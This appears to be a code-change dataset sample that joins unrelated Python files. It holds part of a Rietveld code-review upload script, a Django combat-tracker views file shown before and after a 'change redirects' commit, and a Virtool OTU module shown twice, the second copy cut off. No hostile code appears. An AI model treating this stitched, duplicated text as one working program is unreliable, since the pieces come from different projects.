payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
if not self.authenticated:
self._Authenticate()
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401 or e.code == 302:
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
"""Provides a simplified RPC-style interface for HTTP requests."""
def _Authenticate(self):
"""Save the cookie jar after authentication."""
super(HttpRpcServer, self)._Authenticate()
if self.save_cookies:
StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
self.cookie_jar.save()
def _GetOpener(self):
"""Returns an OpenerDirector that supports cookies and ignores redirects.
Returns:
A urllib2.OpenerDirector object.
"""
opener = urllib2.OpenerDirector()
opener.add_handler(urllib2.ProxyHandler())
opener.add_handler(urllib2.UnknownHandler())
opener.add_handler(urllib2.HTTPHandler())
opener.add_handler(urllib2.HTTPDefaultErrorHandler())
opener.add_handler(urllib2.HTTPSHandler())
opener.add_handler(urllib2.HTTPErrorProcessor())
if self.save_cookies:
self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
if os.path.exists(self.cookie_file):
try:
self.cookie_jar.load()
self.authenticated = True
StatusUpdate("Loaded authentication cookies from %s" % self.cookie_file)
except (cookielib.LoadError, IOError):
# Failed to load cookies - just ignore them.
pass
else:
# Create an empty cookie file with mode 600
fd = os.open(self.cookie_file, os.O_CREAT, 0600)
os.close(fd)
# Always chmod the cookie file
os.chmod(self.cookie_file, 0600)
else:
# Don't save cookies across runs of update.py.
self.cookie_jar = cookielib.CookieJar()
opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
return opener
def GetRpcServer(options):
"""Returns an instance of an AbstractRpcServer.
Returns:
A new AbstractRpcServer, on which RPC calls can be made.
"""
rpc_server_class = HttpRpcServer
def GetUserCredentials():
"""Prompts the user for a username and password."""
# Disable status prints so they don't obscure the password prompt.
global global_status
st = global_status
global_status = None
email = options.email
if email is None:
email = GetEmail("Email (login for uploading to %s)" % options.server)
password = getpass.getpass("Password for %s: " % email)
# Put status back.
global_status = st
return (email, password)
# If this is the dev_appserver, use fake authentication.
host = (options.host or options.server).lower()
if host == "localhost" or host.startswith("localhost:"):
email = options.email
if email is None:
email = "test@example.com"
logging.info("Using debug user %s. Override with --email" % email)
server = rpc_server_class(
options.server,
lambda: (email, "password"),
host_override=options.host,
extra_headers={"Cookie": 'dev_appserver_login="%s:False"' % email},
save_cookies=options.save_cookies)
# Don't try to talk to ClientLogin.
server.authenticated = True
return server
return rpc_server_class(options.server, GetUserCredentials,
host_override=options.host, save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
"""Encode form fields for multipart/form-data.
Args:
fields: A sequence of (name, value) elements for regular form fields.
files: A sequence of (name, filename, value) elements for data to be
uploaded as files.
Returns:
(content_type, body) ready for httplib.HTTP instance.
Source:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
"""
BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
CRLF = '\r\n'
lines = []
for (key, value) in fields:
typecheck(key, str)
typecheck(value, str)
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"' % key)
lines.append('')
lines.append(value)
for (key, filename, value) in files:
typecheck(key, str)
typecheck(filename, str)
typecheck(value, str)
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
lines.append('Content-Type: %s' % GetContentType(filename))
lines.append('')
lines.append(value)
lines.append('--' + BOUNDARY + '--')
lines.append('')
body = CRLF.join(lines)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, body
def GetContentType(filename):
"""Helper to guess the content-type from the filename."""
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
# Use a shell for subcommands on Windows to get a PATH search.
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
universal_newlines=True, env=os.environ):
"""Executes a command and returns the output from stdout and the return code.
Args:
command: Command to execute.
print_output: If True, the output is printed to stdout.
If False, both stdout and stderr are ignored.
universal_newlines: Use universal_newlines flag (default: True).
Returns:
Tuple (output, return code)
"""
logging.info("Running %s", command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=use_shell, universal_newlines=universal_newlines, env=env)
if print_output:
output_array = []
while True:
line = p.stdout.readline()
if not line:
break
print line.strip("\n")
output_array.append(line)
output = "".join(output_array)
else:
output = p.stdout.read()
p.wait()
errout = p.stderr.read()
if print_output and errout:
print >>sys.stderr, errout
p.stdout.close()
p.stderr.close()
return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
print_output=False, env=os.environ):
data, retcode = RunShellWithReturnCode(command, print_output, universal_newlines, env)
if retcode:
ErrorExit("Got error status from %s:\n%s" % (command, data))
if not silent_ok and not data:
ErrorExit("No output from %s" % command)
return data
class VersionControlSystem(object):
"""Abstract base class providing an interface to the VCS."""
def __init__(self, options):
"""Constructor.
Args:
options: Command line options.
"""
self.options = options
def GenerateDiff(self, args):
"""Return the current diff as a string.
Args:
args: Extra arguments to pass to the diff command.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def CheckForUnknownFiles(self):
"""Show an "are you sure?" prompt if there are unknown files."""
unknown_files = self.GetUnknownFiles()
if unknown_files:
print "The following files are not added to version control:"
for line in unknown_files:
print line
prompt = "Are you sure to continue?(y/N) "
answer = raw_input(prompt).strip()
if answer != "y":
ErrorExit("User aborted")
def GetBaseFile(self, filename):
"""Get the content of the upstream version of a file.
Returns:
A tuple (base_content, new_content, is_binary, status)
base_content: The contents of the base file.
new_content: For text files, this is empty. For binary files, this is
the contents of the new file, since the diff output won't contain
information to reconstruct the current file.
is_binary: True iff the file is binary.
status: The status of the file.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetBaseFiles(self, diff):
"""Helper that calls GetBase file for each file in the patch.
Returns:
A dictionary that maps from filename to GetBaseFile's tuple. Filenames
are retrieved based on lines that start with "Index:" or
"Property changes on:".
"""
files = {}
for line in diff.splitlines(True):
if line.startswith('Index:') or line.startswith('Property changes on:'):
unused, filename = line.split(':', 1)
# On Windows if a file has property changes its filename uses '\'
# instead of '/'.
filename = filename.strip().replace('\\', '/')
files[filename] = self.GetBaseFile(filename)
return files
def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
files):
"""Uploads the base files (and if necessary, the current ones as well)."""
def UploadFile(filename, file_id, content, is_binary, status, is_base):
"""Uploads a file to the server."""
set_status("uploading " + filename)
file_too_large = False
if is_base:
type = "base"
else:
type = "current"
if len(content) > MAX_UPLOAD_SIZE:
print ("Not uploading the %s file for %s because it's too large." %
(type, filename))
file_too_large = True
content = ""
checksum = md5(content).hexdigest()
if options.verbose > 0 and not file_too_large:
print "Uploading %s file for %s" % (type, filename)
url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
form_fields = [
("filename", filename),
("status", status),
("checksum", checksum),
("is_binary", str(is_binary)),
("is_current", str(not is_base)),
]
if file_too_large:
form_fields.append(("file_too_large", "1"))
if options.email:
form_fields.append(("user", options.email))
ctype, body = EncodeMultipartFormData(form_fields, [("data", filename, content)])
response_body = rpc_server.Send(url, body, content_type=ctype)
if not response_body.startswith("OK"):
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
# Don't want to spawn too many threads, nor do we want to
# hit Rietveld too hard, or it will start serving 500 errors.
# When 8 works, it's no better than 4, and sometimes 8 is
# too many for Rietveld to handle.
MAX_PARALLEL_UPLOADS = 4
sema = threading.BoundedSemaphore(MAX_PARALLEL_UPLOADS)
upload_threads = []
finished_upload_threads = []
class UploadFileThread(threading.Thread):
def __init__(self, args):
threading.Thread.__init__(self)
self.args = args
def run(self):
UploadFile(*self.args)
finished_upload_threads.append(self)
sema.release()
def StartUploadFile(*args):
sema.acquire()
while len(finished_upload_threads) > 0:
t = finished_upload_threads.pop()
upload_threads.remove(t)
t.join()
t = UploadFileThread(args)
upload_threads.append(t)
t.start()
def WaitForUploads():
for t in upload_threads:
t.join()
patches = dict()
[patches.setdefault(v, k) for k, v in patch_list]
for filename in patches.keys():
base_content, new_content, is_binary, status = files[filename]
file_id_str = patches.get(filename)
if file_id_str.find("nobase") != -1:
base_content = None
file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
file_id = int(file_id_str)
if base_content != None:
StartUploadFile(filename, file_id, base_content, is_binary, status, True)
if new_content != None:
StartUploadFile(filename, file_id, new_content, is_binary, status, False)
WaitForUploads()
def IsImage(self, filename):
"""Returns true if the filename has an image extension."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False
return mimetype.startswith("image/")
def IsBinary(self, filename):
"""Returns true if the guessed mimetyped isnt't in text group."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False # e.g. README, "real" binaries usually have an extension
# special case for text files which don't start with text/
if mimetype in TEXT_MIMETYPES:
return False
return not mimetype.startswith("text/")
class FakeMercurialUI(object):
def __init__(self):
self.quiet = True
self.output = ''
def write(self, *args, **opts):
self.output += ' '.join(args)
use_hg_shell = False # set to True to shell out to hg always; slower
class MercurialVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Mercurial."""
def __init__(self, options, ui, repo):
super(MercurialVCS, self).__init__(options)
self.ui = ui
self.repo = repo
# Absolute path to repository (we can be in a subdir)
self.repo_dir = os.path.normpath(repo.root)
# Compute the subdir
cwd = os.path.normpath(os.getcwd())
assert cwd.startswith(self.repo_dir)
self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
if self.options.revision:
self.base_rev = self.options.revision
else:
mqparent, err = RunShellWithReturnCode(['hg', 'log', '--rev', 'qparent', '--template={node}'])
if not err and mqparent != "":
self.base_rev = mqparent
else:
self.base_rev = RunShell(["hg", "parents", "-q"]).split(':')[1].strip()
def _GetRelPath(self, filename):
"""Get relative path of a file according to the current directory,
given its logical path in the repo."""
assert filename.startswith(self.subdir), (filename, self.subdir)
return filename[len(self.subdir):].lstrip(r"\/")
def GenerateDiff(self, extra_args):
# If no file specified, restrict to the current subdir
extra_args = extra_args or ["."]
cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
data = RunShell(cmd, silent_ok=True)
svndiff = []
filecount = 0
for line in data.splitlines():
m = re.match("diff --git a/(\S+) b/(\S+)", line)
if m:
# Modify line to make it look like as it comes from svn diff.
# With this modification no changes on the server side are required
# to make upload.py work with Mercurial repos.
# NOTE: for proper handling of moved/copied files, we have to use
# the second filename.
filename = m.group(2)
svndiff.append("Index: %s" % filename)
svndiff.append("=" * 67)
filecount += 1
logging.info(line)
else:
svndiff.append(line)
if not filecount:
ErrorExit("No valid patches found in output from hg diff")
return "\n".join(svndiff) + "\n"
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
args = []
status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
silent_ok=True)
unknown_files = []
for line in status.splitlines():
st, fn = line.split(" ", 1)
if st == "?":
unknown_files.append(fn)
return unknown_files
def GetBaseFile(self, filename):
set_status("inspecting " + filename)
# "hg status" and "hg cat" both take a path relative to the current subdir
# rather than to the repo root, but "hg diff" has given us the full path
# to the repo root.
base_content = ""
new_content = None
is_binary = False
oldrelpath = relpath = self._GetRelPath(filename)
# "hg status -C" returns two lines for moved/copied files, one otherwise
if use_hg_shell:
out = RunShell(["hg", "status", "-C", "--rev", self.base_rev, relpath])
else:
fui = FakeMercurialUI()
ret = commands.status(fui, self.repo, *[relpath], **{'rev': [self.base_rev], 'copies': True})
if ret:
raise util.Abort(ret)
out = fui.output
out = out.splitlines()
# HACK: strip error message about missing file/directory if it isn't in
# the working copy
if out[0].startswith('%s: ' % relpath):
out = out[1:]
status, what = out[0].split(' ', 1)
if len(out) > 1 and status == "A" and what == relpath:
oldrelpath = out[1].strip()
status = "M"
if ":" in self.base_rev:
base_rev = self.base_rev.split(":", 1)[0]
else:
base_rev = self.base_rev
if status != "A":
if use_hg_shell:
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath], silent_ok=True)
else:
base_content = str(self.repo[base_rev][oldrelpath].data())
is_binary = "\0" in base_content # Mercurial's heuristic
if status != "R":
new_content = open(relpath, "rb").read()
is_binary = is_binary or "\0" in new_content
if is_binary and base_content and use_hg_shell:
# Fetch again without converting newlines
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True, universal_newlines=False)
if not is_binary or not self.IsImage(relpath):
new_content = None
return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
"""Splits a patch into separate pieces for each file.
Args:
data: A string containing the output of svn diff.
Returns:
A list of 2-tuple (filename, text) where text is the svn diff output
pertaining to filename.
"""
patches = []
filename = None
diff = []
for line in data.splitlines(True):
new_filename = None
if line.startswith('Index:'):
unused, new_filename = line.split(':', 1)
new_filename = new_filename.strip()
elif line.startswith('Property changes on:'):
unused, temp_filename = line.split(':', 1)
# When a file is modified, paths use '/' between directories, however
# when a property is modified '\' is used on Windows. Make them the same
# otherwise the file shows up twice.
temp_filename = temp_filename.strip().replace('\\', '/')
if temp_filename != filename:
# File has property changes but no modifications, create a new diff.
new_filename = temp_filename
if new_filename:
if filename and diff:
patches.append((filename, ''.join(diff)))
filename = new_filename
diff = [line]
continue
if diff is not None:
diff.append(line)
if filename and diff:
patches.append((filename, ''.join(diff)))
return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
"""Uploads a separate patch for each file in the diff output.
Returns a list of [patch_key, filename] for each file.
"""
patches = SplitPatch(data)
rv = []
for patch in patches:
set_status("uploading patch for " + patch[0])
if len(patch[1]) > MAX_UPLOAD_SIZE:
print ("Not uploading the patch for " + patch[0] +
" because the file is too large.")
continue
form_fields = [("filename", patch[0])]
if not options.download_base:
form_fields.append(("content_upload", "1"))
files = [("data", "data.diff", patch[1])]
ctype, body = EncodeMultipartFormData(form_fields, files)
url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
print "Uploading patch for " + patch[0]
response_body = rpc_server.Send(url, body, content_type=ctype)
lines = response_body.splitlines()
if not lines or lines[0] != "OK":
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
rv.append([lines[1], patch[0]])
return rv
|
from django.shortcuts import render, get_object_or_404, redirect
from django.views.generic import DetailView, ListView, UpdateView, CreateView, DeleteView
from django.contrib.auth.mixins import LoginRequiredMixin
from django.template import loader
from seraphim.characters.models import Character
from .models import Combat, StatusEffect, Wound, Heal
from .forms import WoundForm, HealForm
# Create your views here.
def index(request):
combat_list_in_progress = Combat.objects.filter(in_progress=True)
combat_list_complete = Combat.objects.filter(in_progress=False)
context = {
'combat_list_in_progress': combat_list_in_progress,
'combat_list_complete': combat_list_complete,
}
return render(request, 'tracker/index.html', context)
def manage_combat(request, pk):
combat = get_object_or_404(Combat, pk=pk)
context = {}
context['combat'] = combat
context['combat_state'] = combat_state(combat)
return render(request, 'tracker/manage_combat.html', context)
def character_detail(request, combat_pk, character_pk):
context = {}
combat = get_object_or_404(Combat, pk=combat_pk)
character = get_object_or_404(Character, pk=character_pk)
current_hp, max_hp, total_h = character_state(combat, character)
context['combat'] = combat
context['character'] = character
context['current_hp'] = current_hp
context['max_hp'] = max_hp
context['damage'] = max_hp.hp - current_hp.hp
context['total_h'] = total_h
context['woundform'] = WoundForm({
'character': character,
'combat': combat,
'amount': 0,
})
context['healform'] = HealForm({
'character': character,
'combat': combat,
'amount': 0,
})
return render(request, 'tracker/character_detail.html', context)
# def manage_wound(request, combat_pk, character_pk):
# context = {}
# combat = get_object_or_404(Combat, pk=combat_pk)
# character = get_object_or_404(Character, pk=character_pk)
# current_hp, max_hp, total_h = character_state(combat, character)
# context['combat'] = combat
# context['character'] = character
# context['current_hp'] = current_hp
# context['max_hp'] = max_hp
# context['damage'] = max_hp.hp - current_hp.hp
# context['total_h'] = total_h
# return render(request, 'tracker/character_wounds.html', context)
def add_wound(request, combat_pk, character_pk):
if request.method == 'POST':
form = WoundForm(request.POST)
if form.is_valid():
#process as needed
form.save()
return character_detail(request, combat_pk, character_pk)
def add_heal(request, combat_pk, character_pk):
if request.method == 'POST':
form = HealForm(request.POST)
if form.is_valid():
#process as needed
form.save()
return character_detail(request, combat_pk, character_pk)
# Pre-calculate some information to pass along to our templates
def combat_state(combat):
"""
Get the current state of each combatant in the group. Returns
a list of (Character, current_hp, max_hp)
"""
state = []
for character in combat.game_day.group.members.all():
current_hp, max_hp, total_h = character_state(combat, character)
state.append((character, current_hp, max_hp, total_h))
state.sort(key=lambda state: state[0].level, reverse=True)
state.sort(
key=lambda state: state[1].max_hp - state[1].hp, reverse=True)
return state
def character_state(combat, character):
"""
Get the combat status of a single character, as a tuple of
current_hp, max_hp, total healing
"""
max_hp = Max_hp(character.base_hp)
total_h = 0
for effect in StatusEffect.objects.filter(character=character, combat=combat, effect_typ__typ='MAX_HP'):
max_hp.hp += effect.effect_val
current_hp = Current_hp(max_hp.hp)
for wound in Wound.objects.filter(character=character, combat=combat):
current_hp.hp -= wound.amount
for heal in Heal.objects.filter(character=character, combat=combat):
current_hp.hp += heal.amount
total_h += heal.amount
return current_hp, max_hp, total_h
class Max_hp:
def __init__(self, hp):
self.hp = hp
self.base_hp = hp
def __str__(self):
return str(self.hp)
def style(self):
style = "font-weight-light"
if self.hp > self.base_hp:
style += " text-success"
elif self.hp < self.base_hp:
style += " text-muted"
return style
class Current_hp:
def __init__(self, hp):
self.hp = hp
self.max_hp = hp
def __str__(self):
return str(self.hp)
def style(self):
style = "font-weight-bold"
pct = self.hp / self.max_hp
if pct >= 0.99:
style += " "
elif pct >= 0.90:
style = ""
elif pct >= 0.66:
style += " text-success"
elif pct >= 0.33:
style += " text-warning"
elif pct > 0.00:
style += " text-danger"
else:
style += " text-muted"
return style
change redirects
from django.shortcuts import render, get_object_or_404, redirect
from django.views.generic import DetailView, ListView, UpdateView, CreateView, DeleteView
from django.contrib.auth.mixins import LoginRequiredMixin
from django.template import loader
from seraphim.characters.models import Character
from .models import Combat, StatusEffect, Wound, Heal
from .forms import WoundForm, HealForm
# Create your views here.
def index(request):
combat_list_in_progress = Combat.objects.filter(in_progress=True)
combat_list_complete = Combat.objects.filter(in_progress=False)
context = {
'combat_list_in_progress': combat_list_in_progress,
'combat_list_complete': combat_list_complete,
}
return render(request, 'tracker/index.html', context)
def manage_combat(request, pk):
combat = get_object_or_404(Combat, pk=pk)
context = {}
context['combat'] = combat
context['combat_state'] = combat_state(combat)
return render(request, 'tracker/manage_combat.html', context)
def character_detail(request, combat_pk, character_pk):
context = {}
combat = get_object_or_404(Combat, pk=combat_pk)
character = get_object_or_404(Character, pk=character_pk)
current_hp, max_hp, total_h = character_state(combat, character)
context['combat'] = combat
context['character'] = character
context['current_hp'] = current_hp
context['max_hp'] = max_hp
context['damage'] = max_hp.hp - current_hp.hp
context['total_h'] = total_h
context['woundform'] = WoundForm({
'character': character,
'combat': combat,
'amount': 0,
})
context['healform'] = HealForm({
'character': character,
'combat': combat,
'amount': 0,
})
return render(request, 'tracker/character_detail.html', context)
# def manage_wound(request, combat_pk, character_pk):
# context = {}
# combat = get_object_or_404(Combat, pk=combat_pk)
# character = get_object_or_404(Character, pk=character_pk)
# current_hp, max_hp, total_h = character_state(combat, character)
# context['combat'] = combat
# context['character'] = character
# context['current_hp'] = current_hp
# context['max_hp'] = max_hp
# context['damage'] = max_hp.hp - current_hp.hp
# context['total_h'] = total_h
# return render(request, 'tracker/character_wounds.html', context)
def add_wound(request, combat_pk, character_pk):
if request.method == 'POST':
form = WoundForm(request.POST)
if form.is_valid():
#process as needed
form.save()
return manage_combat(request, combat_pk)
def add_heal(request, combat_pk, character_pk):
if request.method == 'POST':
form = HealForm(request.POST)
if form.is_valid():
#process as needed
form.save()
return manage_combat(request, combat_pk)
# Pre-calculate some information to pass along to our templates
def combat_state(combat):
"""
Get the current state of each combatant in the group. Returns
a list of (Character, current_hp, max_hp)
"""
state = []
for character in combat.game_day.group.members.all():
current_hp, max_hp, total_h = character_state(combat, character)
state.append((character, current_hp, max_hp, total_h))
state.sort(key=lambda state: state[0].level, reverse=True)
state.sort(
key=lambda state: state[1].max_hp - state[1].hp, reverse=True)
return state
def character_state(combat, character):
"""
Get the combat status of a single character, as a tuple of
current_hp, max_hp, total healing
"""
max_hp = Max_hp(character.base_hp)
total_h = 0
for effect in StatusEffect.objects.filter(character=character, combat=combat, effect_typ__typ='MAX_HP'):
max_hp.hp += effect.effect_val
current_hp = Current_hp(max_hp.hp)
for wound in Wound.objects.filter(character=character, combat=combat):
current_hp.hp -= wound.amount
for heal in Heal.objects.filter(character=character, combat=combat):
current_hp.hp += heal.amount
total_h += heal.amount
return current_hp, max_hp, total_h
class Max_hp:
def __init__(self, hp):
self.hp = hp
self.base_hp = hp
def __str__(self):
return str(self.hp)
def style(self):
style = "font-weight-light"
if self.hp > self.base_hp:
style += " text-success"
elif self.hp < self.base_hp:
style += " text-muted"
return style
class Current_hp:
def __init__(self, hp):
self.hp = hp
self.max_hp = hp
def __str__(self):
return str(self.hp)
def style(self):
style = "font-weight-bold"
pct = self.hp / self.max_hp
if pct >= 0.99:
style += " "
elif pct >= 0.90:
style = ""
elif pct >= 0.66:
style += " text-success"
elif pct >= 0.33:
style += " text-warning"
elif pct > 0.00:
style += " text-danger"
else:
style += " text-muted"
return style
|
"""
Functions for working with otu documents.
"""
import logging
from copy import deepcopy
import virtool.errors
import virtool.history
import virtool.utils
logger = logging.getLogger(__name__)
def evaluate_changes(data, document):
name = data.get("name", None)
abbreviation = data.get("abbreviation", None)
schema = data.get("schema", None)
if name == document["name"]:
name = None
old_abbreviation = document.get("abbreviation", "")
if abbreviation == old_abbreviation:
abbreviation = None
if schema == document.get("schema", None):
schema = None
return name, abbreviation, schema
def extract_default_isolate(otu, isolate_processor=None):
"""
Returns the default isolate dict for the given otu document.
:param otu: a otu document.
:type otu: dict
:param isolate_processor: a function to process the default isolate into a desired format.
:type: func
:return: the default isolate dict.
:rtype: dict
"""
# Get the otu isolates with the default flag set to True. This list should only contain one item.
default_isolates = [isolate for isolate in otu["isolates"] if isolate["default"] is True]
if len(default_isolates) > 1:
raise ValueError("More than one default isolate found")
if len(default_isolates) == 0:
raise ValueError("No default isolate found")
default_isolate = default_isolates[0]
if isolate_processor:
default_isolate = isolate_processor(default_isolate)
return default_isolate
def extract_default_sequences(joined):
"""
Return a list of sequences from the default isolate of the passed joined otu document.
:param joined: the joined otu document.
:type joined: dict
:return: a list of sequences associated with the default isolate.
:rtype: list
"""
for isolate in joined["isolates"]:
if isolate["default"]:
return isolate["sequences"]
def extract_isolate_ids(otu):
"""
Get the isolate ids from a otu document.
:param otu: a otu document.
:return: a list of isolate ids.
"""
return [isolate["id"] for isolate in otu["isolates"]]
def extract_sequence_ids(otu):
"""
Extract all sequence ids from a merged otu.
:param otu: the merged otu
:type otu: dict
:return: the sequence ids belonging to ``otu``
:rtype: list
"""
sequence_ids = list()
isolates = otu["isolates"]
if not isolates:
raise ValueError("Empty isolates list in merged otu")
for isolate in isolates:
if "sequences" not in isolate:
raise KeyError("Isolate in merged otu missing sequences field")
if not isolate["sequences"]:
raise ValueError("Empty sequences list in merged otu")
sequence_ids += [sequence["_id"] for sequence in isolate["sequences"]]
return sequence_ids
def find_isolate(isolates, isolate_id):
"""
Return the isolate identified by ``isolate_id`` from a list of isolates.
:param isolates: a list of isolate dicts
:type isolates: list
:param isolate_id: the isolate_id of the isolate to return
:type isolate_id: str
:return: an isolate
:rtype: dict
"""
return next((isolate for isolate in isolates if isolate["id"] == isolate_id), None)
def format_otu(joined, issues=False, most_recent_change=None):
"""
Join the otu identified by the passed ``otu_id`` or use the ``joined`` otu document if available. Then,
format the joined otu into a format that can be directly returned to API clients.
:param joined:
:type joined: Union[dict, NoneType]
:param issues: an object describing issues in the otu
:type issues: Union[dict, NoneType, bool]
:param most_recent_change: a change document for the most recent change made to OTU
:type most_recent_change: dict
:return: a joined and formatted otu
:rtype: dict
"""
formatted = virtool.utils.base_processor(joined)
del formatted["lower_name"]
for isolate in formatted["isolates"]:
for sequence in isolate["sequences"]:
del sequence["otu_id"]
del sequence["isolate_id"]
sequence["id"] = sequence.pop("_id")
formatted["most_recent_change"] = None
if most_recent_change:
formatted["most_recent_change"] = virtool.utils.base_processor(most_recent_change)
if issues is False:
issues = verify(joined)
formatted["issues"] = issues
return formatted
def format_isolate_name(isolate):
"""
Take a complete or partial isolate ``dict`` and return a readable isolate name.
:param isolate: a complete or partial isolate ``dict`` containing ``source_type`` and ``source_name`` fields.
:type isolate: dict
:return: an isolate name
:rtype: str
"""
if not isolate["source_type"] or not isolate["source_name"]:
return "Unnamed Isolate"
return " ".join((isolate["source_type"].capitalize(), isolate["source_name"]))
def merge_otu(otu, sequences):
"""
Merge the given sequences in the given otu document. The otu will gain a ``sequences`` field containing a
list of its associated sequence documents.
:param otu: a otu document.
:type otu: dict
:param sequences: the sequence documents to merge into the otu.
:type sequences: list
:return: the merged otu.
:rtype: dict
"""
merged = deepcopy(otu)
for isolate in merged["isolates"]:
isolate_id = isolate["id"]
isolate["sequences"] = [s for s in sequences if s["isolate_id"] == isolate_id]
return merged
def split(merged):
"""
Split a merged otu document into a list of sequence documents associated with the otu and a regular otu
document containing no sequence sub-documents.
:param merged: the merged otu to split
:type merged: dict
:return: a tuple containing the new otu document and a list of sequence documents
:type: tuple
"""
sequences = list()
otu = deepcopy(merged)
for isolate in otu["isolates"]:
sequences += isolate.pop("sequences")
return otu, sequences
def verify(joined):
"""
Checks that the passed otu and sequences constitute valid Virtool records and can be included in a otu
index. Error fields are:
* emtpy_otu - otu has no isolates associated with it.
* empty_isolate - isolates that have no sequences associated with them.
* empty_sequence - sequences that have a zero length sequence field.
* isolate_inconsistency - otu has isolates containing different numbers of sequences.
:param joined: a joined otu
:type joined: dict
:return: return any errors or False if there are no errors.
:rtype: Union[dict, None]
"""
errors = {
"empty_otu": len(joined["isolates"]) == 0,
"empty_isolate": list(),
"empty_sequence": list(),
"isolate_inconsistency": False
}
isolate_sequence_counts = list()
# Append the isolate_ids of any isolates without sequences to empty_isolate. Append the isolate_id and sequence
# id of any sequences that have an empty sequence.
for isolate in joined["isolates"]:
isolate_sequences = isolate["sequences"]
isolate_sequence_count = len(isolate_sequences)
# If there are no sequences attached to the isolate it gets an empty_isolate error.
if isolate_sequence_count == 0:
errors["empty_isolate"].append(isolate["id"])
isolate_sequence_counts.append(isolate_sequence_count)
errors["empty_sequence"] += filter(lambda sequence: len(sequence["sequence"]) == 0, isolate_sequences)
# Give an isolate_inconsistency error the number of sequences is not the same for every isolate. Only give the
# error if the otu is not also emtpy (empty_otu error).
errors["isolate_inconsistency"] = (
len(set(isolate_sequence_counts)) != 1 and not
(errors["empty_otu"] or errors["empty_isolate"])
)
# If there is an error in the otu, return the errors object. Otherwise return False.
has_errors = False
for key, value in errors.items():
if value:
has_errors = True
else:
errors[key] = False
if has_errors:
return errors
return None
Fix conditional formatting
"""
Functions for working with otu documents.
"""
import logging
from copy import deepcopy
import virtool.errors
import virtool.history
import virtool.utils
logger = logging.getLogger(__name__)
def evaluate_changes(data, document):
name = data.get("name", None)
abbreviation = data.get("abbreviation", None)
schema = data.get("schema", None)
if name == document["name"]:
name = None
old_abbreviation = document.get("abbreviation", "")
if abbreviation == old_abbreviation:
abbreviation = None
if schema == document.get("schema", None):
schema = None
return name, abbreviation, schema
def extract_default_isolate(otu, isolate_processor=None):
"""
Returns the default isolate dict for the given otu document.
:param otu: a otu document.
:type otu: dict
:param isolate_processor: a function to process the default isolate into a desired format.
:type: func
:return: the default isolate dict.
:rtype: dict
"""
# Get the otu isolates with the default flag set to True. This list should only contain one item.
default_isolates = [isolate for isolate in otu["isolates"] if isolate["default"] is True]
if len(default_isolates) > 1:
raise ValueError("More than one default isolate found")
if len(default_isolates) == 0:
raise ValueError("No default isolate found")
default_isolate = default_isolates[0]
if isolate_processor:
default_isolate = isolate_processor(default_isolate)
return default_isolate
def extract_default_sequences(joined):
"""
Return a list of sequences from the default isolate of the passed joined otu document.
:param joined: the joined otu document.
:type joined: dict
:return: a list of sequences associated with the default isolate.
:rtype: list
"""
for isolate in joined["isolates"]:
if isolate["default"]:
return isolate["sequences"]
def extract_isolate_ids(otu):
"""
Get the isolate ids from a otu document.
:param otu: a otu document.
:return: a list of isolate ids.
"""
return [isolate["id"] for isolate in otu["isolates"]]
def extract_sequence_ids(otu):
"""
Extract all sequence ids from a merged otu.
:param otu: the merged otu
:type otu: dict
:return: the sequence ids belonging to ``otu``
:rtype: list
"""
sequence_ids = list()
isolates = otu["isolates"]
if not isolates:
raise ValueError("Empty isolates list in merged otu")
for isolate in isolates:
if "sequences" not in isolate:
raise KeyError("Isolate in merged otu missing sequences field")
if not isolate["sequences"]:
raise ValueError("Empty sequences list in merged otu")
